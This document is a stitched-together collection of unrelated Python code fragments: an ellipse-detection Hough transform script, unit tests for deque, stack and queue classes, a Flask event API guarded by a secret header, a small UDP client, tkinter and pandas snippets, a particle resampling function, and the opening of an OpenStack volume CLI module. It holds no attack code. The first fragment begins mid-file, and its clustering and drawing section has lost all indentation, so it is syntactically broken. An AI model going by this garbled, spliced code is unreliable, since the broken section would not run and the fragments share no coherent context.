tmpfile = infile[:-4] + '_space.pgm'

# Output image, cleared to white (255).
outimg = pgm()
outimg.read(infile)
for r in range(outimg.height):
    for c in range(outimg.width):
        outimg.set_pixel(r,c,255)

# Parameterize ellipses as <r,c> = <rc,cc> + <a*cos(theta+phi),b*sin(theta+phi)>
# Search ranges for the semi-axes (a, b) and the angular sampling step.
amin = 5
amax = max(img.width,img.height)
agran = 1
bmin = 5
bmax = max(img.width,img.height)
bgran = 1
thetamin = 0
thetamax = 2*pi
thetagran = pi/10

# Vote accumulator for candidate ellipse parameters.
counts = {}
counts_threshold = 5
def grad(img, r, c):
    """Return the Sobel gradient (gx, gy) of img at pixel (r, c).

    Pixels on the outermost border yield (0, 0), since the 3x3 kernel
    would read outside the image.
    """
    on_border = r <= 0 or c <= 0 or r >= img.height - 1 or c >= img.width - 1
    if on_border:
        return (0, 0)
    px = img.get_pixel
    gx = 0
    gy = 0
    # Horizontal gradient: weighted right column minus weighted left column.
    for dr, w in ((-1, 1), (0, 2), (1, 1)):
        gx += w * (px(r + dr, c + 1) - px(r + dr, c - 1))
    # Vertical gradient: weighted bottom row minus weighted top row.
    for dc, w in ((-1, 1), (0, 2), (1, 1)):
        gy += w * (px(r + 1, c + dc) - px(r - 1, c + dc))
    return (gx, gy)
# Optional CLI overrides: argv[2] = high threshold, argv[3] = low threshold.
if len(sys.argv) >= 3:
    high_threshold = int(sys.argv[2])
if len(sys.argv) >= 4:
    low_threshold = int(sys.argv[3])

# Seed the edge map: mark every interior pixel whose |gx|+|gy| Sobel
# magnitude exceeds the high threshold and queue it for hysteresis growth.
queue = []
r = 1
while r < img.height-1:
    c = 1
    while c < img.width-1:
        gx = img.get_pixel(r-1,c+1) + 2*img.get_pixel(r,c+1) + img.get_pixel(r+1,c+1) - img.get_pixel(r-1,c-1) - 2*img.get_pixel(r,c-1) - img.get_pixel(r+1,c-1)
        gy = img.get_pixel(r+1,c-1) + 2*img.get_pixel(r+1,c) + img.get_pixel(r+1,c+1) - img.get_pixel(r-1,c-1) - 2*img.get_pixel(r-1,c) - img.get_pixel(r-1,c+1)
        if abs(gx) + abs(gy) > high_threshold:
            edges.set_pixel(r,c,1)
            queue.append((r,c))
        else:
            edges.set_pixel(r,c,0)
        c+=1
    r+=1
# Hysteresis + non-maximum suppression: grow edges along the tangent
# direction from the strong seeds, dropping pixels that are not local
# maxima along the gradient (normal) direction.
while len(queue) > 0:
    r,c = queue.pop(0)
    gx, gy = grad(img, r, c)
    # Tangent slope (perpendicular to the gradient) and normal slope.
    if gy == 0:
        tang = 0
    else:
        tang = -float(gx)/gy
    if gx == 0:
        norm = 0
    else:
        norm = float(gy)/gx
    # rounding sin(pi/8) = 0.382  -> snap the normal direction to {-1, 0, 1}
    if norm > 0.382:
        norm = 1
    elif norm < -0.382:
        norm = -1
    else:
        norm = 0
    # end rounding
    # Non-maximum suppression: skip this pixel when either neighbour along
    # the normal has a larger gradient magnitude.
    r1,c1 = r+1,int(c+norm)
    gx1, gy1 = grad(img,r1,c1)
    if(abs(gx1)+abs(gy1) > abs(gx) + abs(gy)):
        continue
    r1,c1 = r-1,int(c-norm)
    gx1, gy1 = grad(img,r1,c1)
    if(abs(gx1)+abs(gy1) > abs(gx) + abs(gy)):
        continue
    # rounding sin(pi/8) = 0.382  -> snap the tangent direction to {-1, 0, 1}
    if tang > 0.382:
        tang = 1
    elif tang < -0.382:
        tang = -1
    else:
        tang = 0
    # end rounding
    # Extend the edge to tangent neighbours that clear the low threshold.
    r1,c1 = r+1,int(c+tang)
    gx1, gy1 = grad(img,r1,c1)
    if edges.get_pixel(r1,c1)==0 and abs(gx1) + abs(gy1) > low_threshold:
        edges.set_pixel(r1,c1,1)
        queue.append((r1,c1))
    r1,c1 = r-1,int(c-tang)
    gx1, gy1 = grad(img,r1,c1)
    if edges.get_pixel(r1,c1)==0 and abs(gx1) + abs(gy1) > low_threshold:
        edges.set_pixel(r1,c1,1)
        queue.append((r1,c1))
# Hough-style voting: for each (a, b) axis pair, every edge pixel votes for
# the centers (rc, cc) it would imply at sampled angles; cells that collect
# enough votes become candidate ellipses.
count_threshold=15
possible_ellipses=[]
a = amin
while a <= amax:
    update_bar(float(100*(a-amin))/(amax-amin),stdscr)
    b = bmin
    while b<=bmax:
        update_bar(float(100*(a-amin))/(amax-amin)+100*float(agran)*(b-bmin)/(float(amax-amin)*(bmax-bmin)),stdscr)
        counts={}
        for r in range(edges.height):
            for c in range(edges.width):
                if edges.get_pixel(r,c) == 1:
                    theta = thetamin
                    while theta < thetamax:
                        # Implied center for this pixel at angle theta.
                        rc=(int(r-a*sin(theta)))
                        cc=(int(c-b*cos(theta)))
                        tup=(rc,cc,a,b)
                        if tup in counts:
                            counts[tup]+=1
                        else:
                            counts[tup]=1
                        theta+=thetagran
        for tup in counts:
            if counts[tup]>count_threshold:
                possible_ellipses.append(tup)
        b+=bgran
    a+=agran
print possible_ellipses
print possible_ellipses
vis={}
is_possible_ellipse={}
for tup in possible_ellipses:
is_possible_ellipse[tup]=True
ellipses=[]
for tup in possible_ellipses:
if vis.get(tup,False):
continue
rtot, ctot, atot, btot = 0,0,0,0
n = 0
q = [tup]
while len(q) > 0:
t = q.pop(0)
if vis.get(t,False):
continue
vis[t]=True
r,c,a,b = t
rtot+=r
ctot+=c
atot+=a
btot+=b
n+=1
t1 = (r+1,c,a,b)
if is_possible_ellipse.get(t1,False):
q.append(t1)
t1 = (r,c+1,a,b)
if is_possible_ellipse.get(t1,False):
q.append(t1)
t1 = (r,c,a+1,b)
if is_possible_ellipse.get(t1,False):
q.append(t1)
t1 = (r,c,a,b+1)
if is_possible_ellipse.get(t1,False):
q.append(t1)
t1 = (r-1,c,a,b)
if is_possible_ellipse.get(t1,False):
q.append(t1)
t1 = (r,c-1,a,b)
if is_possible_ellipse.get(t1,False):
q.append(t1)
t1 = (r,c,a-1,b)
if is_possible_ellipse.get(t1,False):
q.append(t1)
t1 = (r,c,a,b-1)
if is_possible_ellipse.get(t1,False):
q.append(t1)
if n > 0:
ellipses.append((rtot/n,ctot/n,atot/n,btot/n))
print ellipses
for ellipse in ellipses:
r, c, a, b = ellipse
theta = 0
while theta < 2*pi:
outimg.set_pixel(int(r+a*sin(theta)),int(c+b*cos(theta)),0)
theta+=pi/1000
outimg.write(outfile)
curses.nocbreak()
stdscr.keypad(0)
curses.echo()
curses.endwin()
|
import unittest
from Deque_Generator import get_deque
from Stack import Stack
from Queue import Queue
class DSQTester(unittest.TestCase):
    """Unit tests for the Deque, Stack and Queue implementations.

    Each test gets fresh, empty instances from setUp; the string form of a
    container is expected to be '[ ]' when empty and '[ a, b, ... ]' otherwise.
    """

    def setUp(self):
        # Fresh containers for every test (name-mangled to _DSQTester__*).
        self.__deque = get_deque()
        self.__stack = Stack()
        self.__queue = Queue()

    # Deque Tests
    # Empty List Test
    def test_empty_deque(self):
        self.assertEqual('[ ]', str(self.__deque))

    # Length Tests
    def test_length_no_entry_deque(self):
        self.assertEqual(0, len(self.__deque))

    def test_length_one_entry_deque(self):
        self.__deque.push_back('Data')
        self.assertEqual(1, len(self.__deque))

    def test_length_three_entry_deque(self):
        self.__deque.push_back('Data')
        self.__deque.push_back('Structures')
        self.__deque.push_back('Rocks')
        self.assertEqual(3, len(self.__deque))

    # Push Front Tests
    def test_push_front_one_entry_deque(self):
        self.__deque.push_front('Data')
        self.assertEqual('[ Data ]', str(self.__deque))

    def test_push_front_three_entry_deque(self):
        self.__deque.push_front('Rocks')
        self.__deque.push_front('Structures')
        self.__deque.push_front('Data')
        self.assertEqual('[ Data, Structures, Rocks ]', str(self.__deque))

    # Pop Front Tests
    def test_pop_front_no_entry_deque(self):
        returned = self.__deque.pop_front()
        self.assertEqual(None, returned)

    def test_pop_front_no_entry_not_modified_deque(self):
        self.__deque.pop_front()
        self.assertEqual('[ ]', str(self.__deque))

    def test_pop_front_one_entry_deque(self):
        self.__deque.push_front('Data')
        self.__deque.pop_front()
        self.assertEqual('[ ]', str(self.__deque))

    def test_pop_front_one_entry_deque_returned_value(self):
        self.__deque.push_front('Data')
        returned = self.__deque.pop_front()
        self.assertEqual('Data', returned)

    def test_pop_front_three_entry_deque(self):
        self.__deque.push_front('Rocks')
        self.__deque.push_front('Structures')
        self.__deque.push_front('Data')
        self.__deque.pop_front()
        self.assertEqual('[ Structures, Rocks ]', str(self.__deque))

    def test_pop_front_three_entry_deque_returned_value(self):
        self.__deque.push_front('Rocks')
        self.__deque.push_front('Structures')
        self.__deque.push_front('Data')
        returned = self.__deque.pop_front()
        self.assertEqual('Data', returned)

    def test_pop_two_front_three_entry_deque(self):
        self.__deque.push_front('Rocks')
        self.__deque.push_front('Structures')
        self.__deque.push_front('Data')
        self.__deque.pop_front()
        self.__deque.pop_front()
        self.assertEqual('[ Rocks ]', str(self.__deque))

    def test_pop_two_front_three_entry_deque_first_returned_value(self):
        self.__deque.push_front('Rocks')
        self.__deque.push_front('Structures')
        self.__deque.push_front('Data')
        returned = self.__deque.pop_front()
        self.__deque.pop_front()
        self.assertEqual('Data', returned)

    def test_pop_two_front_three_entry_deque_second_returned_value(self):
        self.__deque.push_front('Rocks')
        self.__deque.push_front('Structures')
        self.__deque.push_front('Data')
        self.__deque.pop_front()
        returned = self.__deque.pop_front()
        self.assertEqual('Structures', returned)

    # Peek Front Tests
    def test_peek_front_no_entry_deque(self):
        returned = self.__deque.peek_front()
        self.assertEqual(None, returned)

    def test_peek_front_one_entry_deque(self):
        self.__deque.push_front('Data')
        returned = self.__deque.peek_front()
        self.assertEqual('Data', returned)

    def test_peek_front_three_entry_deque(self):
        self.__deque.push_front('Rocks')
        self.__deque.push_front('Structures')
        self.__deque.push_front('Data')
        returned = self.__deque.peek_front()
        self.assertEqual('Data', returned)

    def test_peek_front_not_modified_deque(self):
        self.__deque.push_front('Data')
        self.__deque.peek_front()
        self.assertEqual('[ Data ]', str(self.__deque))

    # Push Back Tests
    def test_push_back_one_entry_deque(self):
        self.__deque.push_back('Data')
        self.assertEqual('[ Data ]', str(self.__deque))

    def test_push_back_three_entry_deque(self):
        self.__deque.push_back('Data')
        self.__deque.push_back('Structures')
        self.__deque.push_back('Rocks')
        self.assertEqual('[ Data, Structures, Rocks ]', str(self.__deque))

    # Pop Back Tests
    def test_pop_back_no_entry_deque(self):
        returned = self.__deque.pop_back()
        self.assertEqual(None, returned)

    def test_pop_back_no_entry_deque_not_modified(self):
        self.__deque.pop_back()
        self.assertEqual('[ ]', str(self.__deque))

    def test_pop_back_one_entry_deque(self):
        self.__deque.push_front('Data')
        self.__deque.pop_back()
        self.assertEqual('[ ]', str(self.__deque))

    def test_pop_back_one_entry_deque_return_value(self):
        self.__deque.push_front('Data')
        returned = self.__deque.pop_back()
        self.assertEqual('Data', returned)

    def test_pop_back_three_entry_deque(self):
        self.__deque.push_front('Rocks')
        self.__deque.push_front('Structures')
        self.__deque.push_front('Data')
        self.__deque.pop_back()
        self.assertEqual('[ Data, Structures ]', str(self.__deque))

    def test_pop_back_three_entry_deque_return_value(self):
        self.__deque.push_front('Rocks')
        self.__deque.push_front('Structures')
        self.__deque.push_front('Data')
        returned = self.__deque.pop_back()
        self.assertEqual('Rocks', returned)

    def test_pop_two_back_three_entry_deque(self):
        self.__deque.push_front('Rocks')
        self.__deque.push_front('Structures')
        self.__deque.push_front('Data')
        self.__deque.pop_back()
        self.__deque.pop_back()
        self.assertEqual('[ Data ]', str(self.__deque))

    def test_pop_two_back_three_entry_deque_first_returned_value(self):
        self.__deque.push_front('Rocks')
        self.__deque.push_front('Structures')
        self.__deque.push_front('Data')
        returned = self.__deque.pop_back()
        self.__deque.pop_back()
        self.assertEqual('Rocks', returned)

    def test_pop_two_back_three_entry_deque_second_returned_value(self):
        self.__deque.push_front('Rocks')
        self.__deque.push_front('Structures')
        self.__deque.push_front('Data')
        self.__deque.pop_back()
        returned = self.__deque.pop_back()
        self.assertEqual('Structures', returned)

    # Peek Back Tests
    def test_peek_back_no_entry_deque(self):
        returned = self.__deque.peek_back()
        self.assertEqual(None, returned)

    def test_peek_back_one_entry_deque(self):
        self.__deque.push_front('Data')
        returned = self.__deque.peek_back()
        self.assertEqual('Data', returned)

    def test_peek_back_three_entry_deque(self):
        self.__deque.push_front('Rocks')
        self.__deque.push_front('Structures')
        self.__deque.push_front('Data')
        returned = self.__deque.peek_back()
        self.assertEqual('Rocks', returned)

    def test_peek_back_not_modified_deque(self):
        self.__deque.push_front('Data')
        self.__deque.peek_back()
        self.assertEqual('[ Data ]', str(self.__deque))

    # Stack Tests
    # Empty List Test
    def test_empty_stack(self):
        self.assertEqual('[ ]', str(self.__stack))

    # Length Tests
    def test_length_no_entry_stack(self):
        self.assertEqual(0, len(self.__stack))

    def test_length_one_entry_stack(self):
        self.__stack.push('Data')
        self.assertEqual(1, len(self.__stack))

    def test_length_three_entry_stack(self):
        self.__stack.push('Data')
        self.__stack.push('Structures')
        self.__stack.push('Rocks')
        self.assertEqual(3, len(self.__stack))

    # Push Tests
    def test_push_one_entry_stack(self):
        self.__stack.push('Data')
        self.assertEqual('[ Data ]', str(self.__stack))

    def test_push_three_entry_stack(self):
        self.__stack.push('Rocks')
        self.__stack.push('Structures')
        self.__stack.push('Data')
        self.assertEqual('[ Data, Structures, Rocks ]', str(self.__stack))

    # Pop Tests
    def test_pop_no_entry_stack(self):
        returned = self.__stack.pop()
        self.assertEqual(None, returned)

    def test_pop_no_entry_stack_not_modified(self):
        self.__stack.pop()
        self.assertEqual('[ ]', str(self.__stack))

    def test_pop_one_entry_stack(self):
        self.__stack.push('Data')
        self.__stack.pop()
        self.assertEqual('[ ]', str(self.__stack))

    def test_pop_one_entry_stack_returned_value(self):
        self.__stack.push('Data')
        returned = self.__stack.pop()
        self.assertEqual('Data', returned)

    def test_pop_three_entry_stack(self):
        self.__stack.push('Rocks')
        self.__stack.push('Structures')
        self.__stack.push('Data')
        self.__stack.pop()
        self.assertEqual('[ Structures, Rocks ]', str(self.__stack))

    def test_pop_two_entry_stack_returned_value(self):
        self.__stack.push('Rocks')
        self.__stack.push('Structures')
        self.__stack.push('Data')
        returned = self.__stack.pop()
        self.assertEqual('Data', returned)

    def test_pop_two_three_entry_stack(self):
        self.__stack.push('Rocks')
        self.__stack.push('Structures')
        self.__stack.push('Data')
        self.__stack.pop()
        self.__stack.pop()
        self.assertEqual('[ Rocks ]', str(self.__stack))

    def test_pop_two_three_entry_stack_first_returned_value(self):
        self.__stack.push('Rocks')
        self.__stack.push('Structures')
        self.__stack.push('Data')
        returned = self.__stack.pop()
        self.__stack.pop()
        self.assertEqual('Data', returned)

    def test_pop_two_three_entry_stack_second_returned_value(self):
        self.__stack.push('Rocks')
        self.__stack.push('Structures')
        self.__stack.push('Data')
        self.__stack.pop()
        returned = self.__stack.pop()
        self.assertEqual('Structures', returned)

    # Peek Tests
    def test_peek_no_entry_stack(self):
        returned = self.__stack.peek()
        self.assertEqual(None, returned)

    def test_peek_one_entry_stack(self):
        self.__stack.push('Data')
        returned = self.__stack.peek()
        self.assertEqual('Data', returned)

    def test_peek_three_entry_stack(self):
        self.__stack.push('Rocks')
        self.__stack.push('Structures')
        self.__stack.push('Data')
        returned = self.__stack.peek()
        self.assertEqual('Data', returned)

    def test_peek_not_modified_stack(self):
        self.__stack.push('Data')
        self.__stack.peek()
        self.assertEqual('[ Data ]', str(self.__stack))

    # Queue Tests
    # Empty List Test
    def test_empty_queue(self):
        self.assertEqual('[ ]', str(self.__queue))

    # Length Tests
    def test_length_no_entry_queue(self):
        self.assertEqual(0, len(self.__queue))

    def test_length_one_entry_queue(self):
        self.__queue.enqueue('Data')
        self.assertEqual(1, len(self.__queue))

    def test_length_three_entry_queue(self):
        self.__queue.enqueue('Data')
        self.__queue.enqueue('Structures')
        self.__queue.enqueue('Rocks')
        self.assertEqual(3, len(self.__queue))

    # Enqueue Tests
    def test_enqueue_one_entry_queue(self):
        self.__queue.enqueue('Data')
        self.assertEqual('[ Data ]', str(self.__queue))

    def test_enqueue_three_entry_queue(self):
        self.__queue.enqueue('Data')
        self.__queue.enqueue('Structures')
        self.__queue.enqueue('Rocks')
        self.assertEqual('[ Data, Structures, Rocks ]', str(self.__queue))

    # Dequeue Tests
    def test_dequeue_no_entry_queue(self):
        returned = self.__queue.dequeue()
        self.assertEqual(None, returned)

    def test_dequeue_no_entry_queue_not_modified(self):
        self.__queue.dequeue()
        self.assertEqual('[ ]', str(self.__queue))

    def test_dequeue_one_entry_queue(self):
        self.__queue.enqueue('Data')
        self.__queue.dequeue()
        self.assertEqual('[ ]', str(self.__queue))

    def test_dequeue_one_entry_queue_returned_value(self):
        self.__queue.enqueue('Data')
        returned = self.__queue.dequeue()
        self.assertEqual('Data', returned)

    def test_dequeue_three_entry_queue(self):
        self.__queue.enqueue('Data')
        self.__queue.enqueue('Structures')
        self.__queue.enqueue('Rocks')
        self.__queue.dequeue()
        self.assertEqual('[ Structures, Rocks ]', str(self.__queue))

    def test_dequeue_three_entry_queue_returned_value(self):
        self.__queue.enqueue('Data')
        self.__queue.enqueue('Structures')
        self.__queue.enqueue('Rocks')
        returned = self.__queue.dequeue()
        self.assertEqual('Data', returned)

    def test_dequeue_two_three_entry_queue(self):
        self.__queue.enqueue('Data')
        self.__queue.enqueue('Structures')
        self.__queue.enqueue('Rocks')
        self.__queue.dequeue()
        self.__queue.dequeue()
        self.assertEqual('[ Rocks ]', str(self.__queue))

    def test_dequeue_two_three_entry_queue_first_returned_value(self):
        self.__queue.enqueue('Data')
        self.__queue.enqueue('Structures')
        self.__queue.enqueue('Rocks')
        returned = self.__queue.dequeue()
        self.__queue.dequeue()
        self.assertEqual('Data', returned)

    def test_dequeue_two_three_entry_queue_second_returned_value(self):
        self.__queue.enqueue('Data')
        self.__queue.enqueue('Structures')
        self.__queue.enqueue('Rocks')
        self.__queue.dequeue()
        returned = self.__queue.dequeue()
        self.assertEqual('Structures', returned)
# Run the whole suite when executed directly.
if __name__ == '__main__':
    unittest.main()
from uuid import UUID
from flask import request
from flask_restplus import Namespace, Resource, fields
import config
from mappers.event_mappers import EventResponseSchema, TotalByTypeResponseSchema
from repository.event_repo import EventRepo
from shared import response_object as res
from shared.enum.order_enum import OrderType
from use_cases.event import event_request_objects as req
from use_cases.event import event_use_cases as uc
api = Namespace('Event', description='Event endpoints for Remarkably Code Test')

# Map use-case response types to HTTP status codes for api.abort().
STATUS_CODES = {
    res.ResponseSuccess.SUCCESS: 200,
    res.ResponseFailure.RESOURCE_ERROR: 404,
    res.ResponseFailure.PARAMETERS_ERROR: 400,
    res.ResponseFailure.BUSINESS_ERROR: 400,
    res.ResponseFailure.SYSTEM_ERROR: 500
}

# SWAGGER DOC
# Response shape of a stored event.
event_model = api.model('Event model', {
    'id': fields.String(description='event id'),
    'item': fields.String(description='move out item id'),
    'detail': fields.String(description='Details about event'),
    'type': fields.String(description='Type of an event'),
    'created': fields.DateTime(description='Date of event creation')
})

# Request payload for creating an event (no id/created — server-assigned).
create_event_model = api.model('Create event model', {
    'item': fields.String(description='move out item id'),
    'detail': fields.String(description='Details about event'),
    'type': fields.String(description='Type of an event'),
})

# Aggregated per-type event counts.
event_total_by_type_model = api.model('Total events by type model', {
    'system': fields.Integer(description='System event total'),
    'external': fields.Integer(description='External event total'),
    'staff': fields.Integer(description='Staff event total'),
    'user': fields.Integer(description='User event total'),
    'unknown': fields.Integer(description='Unknown event total')
})
@api.route('')
class Event(Resource):
    """Collection endpoint: create a new event (POST) or list all events (GET)."""

    @api.response(200, 'Success', event_model)
    @api.response(404, 'Resource error')
    @api.response(400, 'Parameters error')
    @api.response(500, 'System error')
    @api.expect(create_event_model)
    # POST new event into database
    def post(self):
        # Reject callers without the shared secret header.
        if request.headers.get('Secret') != config.BaseConfig.SECRET_KEY:
            return api.abort(401, 'You are not allowed to get data from endpoint')
        # Get event data
        payload = request.get_json()
        save_request = req.SaveEventRequestObject.from_dict(adict=payload)
        outcome = uc.SaveEventUseCase(EventRepo()).execute(save_request)
        if not outcome:
            api.abort(STATUS_CODES[outcome.type],
                      outcome.message,
                      error_code=outcome.error_code,
                      error_key=outcome.error_key,
                      error_params=outcome.error_params)
        return EventResponseSchema().dump(outcome.value)

    def get(self):
        if request.headers.get('Secret') != config.BaseConfig.SECRET_KEY:
            return api.abort(401, 'You are not allowed to get data from endpoint')
        # Sort order defaults to newest-first.
        filter_params = {
            'sort': request.args.get('sort', default=OrderType.DESCENDING, type=OrderType)
        }
        list_request = req.GetEventsRequestObject.from_filter_list(filter_params)
        outcome = uc.GetEventsUseCase(EventRepo()).execute(list_request)
        if not outcome:
            api.abort(STATUS_CODES[outcome.type],
                      outcome.message,
                      error_code=outcome.error_code,
                      error_key=outcome.error_key,
                      error_params=outcome.error_params)
        return EventResponseSchema(many=True).dump(outcome.value)
@api.route('/<string:uuid>')
class SpecificEvent(Resource):
    """Fetch a single event by its UUID."""

    @api.response(200, 'Success', event_model)
    @api.response(404, 'Resource error')
    @api.response(400, 'Parameters error')
    @api.response(500, 'System error')
    # GET specific event from database
    def get(self, uuid):
        if request.headers.get('Secret') != config.BaseConfig.SECRET_KEY:
            return api.abort(401, 'You are not allowed to get data from endpoint')
        # Validate the path parameter is a well-formed UUID.
        try:
            event_id = UUID(uuid)
        except ValueError:
            return api.abort(400, 'Wrong input data provided')
        get_request = req.GetEventRequestObject.from_uuid(uuid=event_id)
        outcome = uc.GetEventUseCase(EventRepo()).execute(get_request)
        if not outcome:
            api.abort(STATUS_CODES[outcome.type],
                      outcome.message,
                      error_code=outcome.error_code,
                      error_key=outcome.error_key,
                      error_params=outcome.error_params)
        return EventResponseSchema().dump(outcome.value)
@api.route('/specificitem/<string:uuid>')
class ItemEvents(Resource):
    """List all events belonging to one move-out item.

    Renamed from ``SpecificEvent``: four classes in this module reused that
    name, so each redefinition shadowed the previous binding (flake8 F811).
    The route registration and behavior are unchanged.
    """

    @api.response(200, 'Success', [event_model])
    @api.response(404, 'Resource error')
    @api.response(400, 'Parameters error')
    @api.response(500, 'System error')
    # GET all events for specific item from database
    def get(self, uuid):
        if request.headers.get('Secret') != config.BaseConfig.SECRET_KEY:
            return api.abort(401, 'You are not allowed to get data from this endpoint')
        # Validate the path parameter is a well-formed UUID.
        try:
            uuid = UUID(uuid)
        except ValueError:
            return api.abort(400, 'Wrong input data provided')
        request_object = req.GetEventForSpecificItemRequestObject.from_uuid(uuid=uuid)
        use_case = uc.GetEventForSpecificItemUseCase(EventRepo())
        response = use_case.execute(request_object)
        if not response:
            api.abort(STATUS_CODES[response.type],
                      response.message,
                      error_code=response.error_code,
                      error_key=response.error_key,
                      error_params=response.error_params)
        result = EventResponseSchema(many=True).dump(response.value)
        return result
@api.route('/totalbytype')
class EventTotalsByType(Resource):
    """Return per-type event counts.

    Renamed from ``SpecificEvent`` to resolve the duplicate class name
    (flake8 F811); route registration and behavior are unchanged.
    """

    @api.response(200, 'Success', event_total_by_type_model)
    @api.response(404, 'Resource error')
    @api.response(400, 'Parameters error')
    @api.response(500, 'System error')
    # GET count of events by type from database
    def get(self):
        if request.headers.get('Secret') != config.BaseConfig.SECRET_KEY:
            return api.abort(401, 'You are not allowed to get data from endpoint')
        use_case = uc.GetTotalEventsByTypeUseCase(EventRepo())
        response = use_case.execute()
        if not response:
            api.abort(STATUS_CODES[response.type],
                      response.message,
                      error_code=response.error_code,
                      error_key=response.error_key,
                      error_params=response.error_params)
        result = TotalByTypeResponseSchema().dump(response.value)
        return result
@api.route('/oldestevent')
class OldestEvent(Resource):
    """Return the oldest event in the database.

    Renamed from ``SpecificEvent`` to resolve the duplicate class name
    (flake8 F811); route registration and behavior are unchanged.
    """

    @api.response(200, 'Success', event_model)
    @api.response(404, 'Resource error')
    @api.response(400, 'Parameters error')
    @api.response(500, 'System error')
    # GET oldest event from database
    def get(self):
        if request.headers.get('Secret') != config.BaseConfig.SECRET_KEY:
            return api.abort(401, 'You are not allowed to get data from endpoint')
        use_case = uc.OldestEventUseCase(EventRepo())
        response = use_case.execute()
        if not response:
            api.abort(STATUS_CODES[response.type],
                      response.message,
                      error_code=response.error_code,
                      error_key=response.error_key,
                      error_params=response.error_params)
        result = EventResponseSchema().dump(response.value)
        return result
@api.route('/newestevent')
class NewestEvent(Resource):
    """Return the newest event in the database.

    Renamed from ``SpecificEvent`` to resolve the duplicate class name
    (flake8 F811); route registration and behavior are unchanged.
    """

    @api.response(200, 'Success', event_model)
    @api.response(404, 'Resource error')
    @api.response(400, 'Parameters error')
    @api.response(500, 'System error')
    # GET newest event from database
    def get(self):
        if request.headers.get('Secret') != config.BaseConfig.SECRET_KEY:
            return api.abort(401, 'You are not allowed to get data from endpoint')
        use_case = uc.NewestEventUseCase(EventRepo())
        response = use_case.execute()
        if not response:
            api.abort(STATUS_CODES[response.type],
                      response.message,
                      error_code=response.error_code,
                      error_key=response.error_key,
                      error_params=response.error_params)
        result = EventResponseSchema().dump(response.value)
        return result
|
import socket

# UDP client: sends a handful of test strings (ending with the '.' sentinel)
# to the server and prints each reply.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
print('I am connecting the server!')
for msg in ['aBch', 'f服务d', 'h7Tq', '.']:
    # BUG FIX: sockets transmit bytes — a plain str raises TypeError in
    # Python 3, so encode before sending.
    s.sendto(msg.encode('utf-8'), ('192.168.3.13', 8088))
    reply, addr = s.recvfrom(1024)
    # BUG FIX: print the datagram already received; the original decoded it
    # into an unused variable and then blocked on a *second* recv() per
    # message, consuming two replies for every send.
    print(str(reply, encoding='utf-8'))
s.close()
|
import tkinter as tk

root = tk.Tk()
# BUG FIX: tk.Frame accepts no 'text' option — passing one raises
# _tkinter.TclError at startup. tk.LabelFrame is the frame variant that
# displays a caption.
frame1 = tk.LabelFrame(root, text="Frame 1")
frame1.pack()
frame2 = tk.LabelFrame(root, text="Frame 2")
frame2.pack()
root.mainloop()
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Select from accident data the rows with those street names that are in traffic data
import pandas as pd
import numpy as np

accidents = pd.read_csv('data/5_accidents.csv')
road_usages = pd.read_csv('data/4_road_usages.csv')

# Street names that appear in the traffic (road-usage) data.
known_roads = list(road_usages.nimi.unique())

# Keep only accidents whose street address matches one of those roads.
selected = accidents[accidents.Katuosoite.isin(known_roads)]

# Prepend a fresh running index column, then persist the filtered set.
selected.insert(loc=0, column='a-index', value=np.arange(len(selected)))
selected.to_csv('data/6_accidents.csv', index=False)
|
def resample_particles(particle_poses, particle_weights, num_particles):
    """Stratified (low-variance) resampling of particles by weight.

    particle_poses -- (3, N) array of particle poses.
    particle_weights -- (1, N) array of weights; assumed to sum to ~1
        (otherwise the cumulative walk below can index past the end) —
        TODO confirm with callers.
    num_particles -- number of particles N to draw.

    Returns (resampled_poses, resampled_weights) where resampled_poses is
    (3, N) made of columns of ``particle_poses`` and resampled_weights is
    a (1, N) array of uniform weights 1/N.
    """
    # Index of the input particle whose cumulative-weight interval we are
    # currently inside.
    source_index = 0
    # Running cumulative weight up to and including ``source_index``.
    cumulative_weight = particle_weights[0, 0]
    resampled_particle_poses = np.zeros((3, num_particles))
    # Resampled particles all carry equal weight 1/N.
    resampled_particle_weights = np.tile(1 / num_particles, num_particles).reshape(1, num_particles)
    for i in range(num_particles):
        # Stratified draw: one uniform sample inside the i-th of N strata
        # of the unit interval.
        threshold = np.random.uniform(0, 1 / num_particles) + i / num_particles
        # Walk the cumulative weight distribution until it covers the
        # threshold for this stratum.
        while threshold > cumulative_weight:
            source_index += 1
            cumulative_weight = cumulative_weight + particle_weights[0, source_index]
        # BUG FIX: copy the selected pose from the *input* particle set.
        # The original read from the zero-initialized output array itself
        # (resampled_particle_poses[:, source_index]), so the function
        # always returned all-zero poses.
        resampled_particle_poses[:, i] = particle_poses[:, source_index]
    return resampled_particle_poses, resampled_particle_weights
|
# Copyright 2012-2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Volume v1 Volume action implementations"""
import argparse
import functools
import logging
from cliff import columns as cliff_columns
from osc_lib.cli import format_columns
from osc_lib.cli import parseractions
from osc_lib.command import command
from osc_lib import exceptions
from osc_lib import utils
from openstackclient.i18n import _
LOG = logging.getLogger(__name__)
class AttachmentsColumn(cliff_columns.FormattableColumn):
    """Formattable column for attachments column.

    Unlike the parent FormattableColumn class, the initializer of the
    class takes server_cache as the second argument.
    osc_lib.utils.get_item_properties instantiate cliff FormattableColumn
    object with a single parameter "column value", so you need to pass
    a partially initialized class like
    ``functools.partial(AttachmentsColumn, server_cache)``.
    """

    def __init__(self, value, server_cache=None):
        super(AttachmentsColumn, self).__init__(value)
        self._server_cache = server_cache or {}

    def human_readable(self):
        """Return a formatted string of a volume's attached instances

        :rtype: a string of formatted instances
        """
        pieces = []
        for attachment in self._value:
            server = attachment['server_id']
            # Swap the server ID for its name when the cache knows it.
            if server in self._server_cache:
                server = self._server_cache[server].name
            device = attachment['device']
            pieces.append('Attached to %s on %s ' % (server, device))
        return ''.join(pieces)
def _check_size_arg(args):
    """Check whether --size option is required or not.

    Require size parameter only in case when snapshot or source
    volume is not specified.
    """
    # A snapshot or source volume makes --size optional.
    if (args.snapshot or args.source) is not None:
        return
    if args.size is not None:
        return
    raise exceptions.CommandError(_(
        "--size is a required option if snapshot "
        "or source volume is not specified."
    ))
class CreateVolume(command.ShowOne):
    """``volume create`` command: create a volume and show its properties."""

    _description = _("Create new volume")

